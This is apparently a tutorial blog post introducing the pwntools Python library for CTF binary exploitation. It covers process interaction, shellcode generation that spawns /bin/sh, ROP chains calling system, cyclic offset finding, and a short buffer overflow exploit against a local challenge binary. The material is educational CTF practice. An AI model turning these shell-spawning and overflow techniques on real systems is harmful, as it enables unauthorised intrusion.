Skip to main content

Pwntools for CTF Binary Exploitation

Binary exploitation is one of the most challenging yet rewarding categories in Capture The Flag competitions. While understanding the underlying vulnerabilities is crucial, having the right tools can make the difference between solving a challenge and hitting a wall. Enter pwntools โ€” the Python library that has become the de facto standard for CTF binary exploitation.

What is Pwntools?โ€‹

Pwntools is a CTF framework and exploit development library written in Python. It provides a clean, intuitive API for common exploit development tasks like process interaction, shellcode generation, ROP chain building, and more. Whether you're exploiting a local binary or attacking a remote service, pwntools streamlines the workflow.

Installationโ€‹

Getting started is straightforward:

pip install pwntools

For the latest development version:

git clone https://github.com/Gallopsled/pwntools
cd pwntools
pip install -e .

Core Featuresโ€‹

Process Interactionโ€‹

The most basic use case is interacting with processes. Pwntools makes this trivial:

from pwn import *

# Local process
p = process('./vulnerable_binary')

# Remote connection
r = remote('ctf.example.com', 1337)

# Send and receive data
p.sendline(b'A' * 100)
data = p.recv(1024)
p.interactive()  # Drop into interactive mode

Shellcode Generationโ€‹

Need shellcode? Pwntools has you covered:

from pwn import *

# Generate shellcode for execve("/bin/sh")
shellcode = asm(shellcraft.sh())

# Architecture-specific shellcode
context.arch = 'amd64'
shellcode_64 = asm(shellcraft.amd64.linux.sh())

ROP Chain Buildingโ€‹

Return-Oriented Programming is essential for modern exploitation. Pwntools includes a powerful ROP module:

from pwn import *

elf = ELF('./binary')
rop = ROP(elf)

# Find gadgets and build chains
rop.call('system', [next(elf.search(b'/bin/sh'))])
payload = b'A' * 72 + rop.chain()

Packing and Unpackingโ€‹

Converting between integers and bytes is constant in exploitation:

from pwn import *

# Pack addresses (respects context.arch)
address = p64(0xdeadbeef)  # 64-bit
address = p32(0xcafebabe)  # 32-bit

# Unpack data
value = u64(b'\xef\xbe\xad\xde\x00\x00\x00\x00')

Practical Example: Buffer Overflowโ€‹

Here's a complete exploit for a classic buffer overflow:

from pwn import *

# Set up the target
elf = ELF('./vuln')
p = process('./vuln')

# Find the offset
offset = 72

# Build exploit
payload = flat(
    b'A' * offset,
    elf.symbols['win']  # Jump to win function
)

p.sendline(payload)
p.interactive()

Advanced Featuresโ€‹

Cyclic Patternsโ€‹

Finding offsets is easier with cyclic patterns:

from pwn import *

# Generate unique pattern
pattern = cyclic(200)

# After crash, find offset
offset = cyclic_find(0x61616171)  # 'qaaa'

ELF Parsingโ€‹

Pwntools can parse ELF binaries and extract useful information:

from pwn import *

elf = ELF('./binary')
print(hex(elf.symbols['main']))
print(hex(elf.got['puts']))
print(hex(elf.plt['system']))

Loggingโ€‹

Built-in logging makes debugging easier:

from pwn import *

log.info("Starting exploit...")
log.success("Shell spawned!")
log.warning("ASLR detected")
log.error("Exploit failed")

Best Practicesโ€‹

Set Context Early: Always configure your target architecture and OS at the start:

context.arch = 'amd64'
context.os = 'linux'

Use Templates: Create reusable exploit templates for common scenarios.

Debug Mode: Enable debugging to see all communication:

context.log_level = 'debug'

Test Locally First: Always test exploits against local binaries before attacking remote targets.

Conclusionโ€‹

Pwntools transforms binary exploitation from tedious byte manipulation into expressive Python code. Its extensive feature set handles the boilerplate, letting you focus on the vulnerability itself. Whether you're a CTF beginner or seasoned player, mastering pwntools will significantly boost your binary exploitation capabilities.

The library is actively maintained, well-documented, and has a strong community. Start with simple buffer overflows, then progress to ROP chains, format strings, and heap exploits. With pwntools in your arsenal, you'll be pwning challenges in no time.

Resources: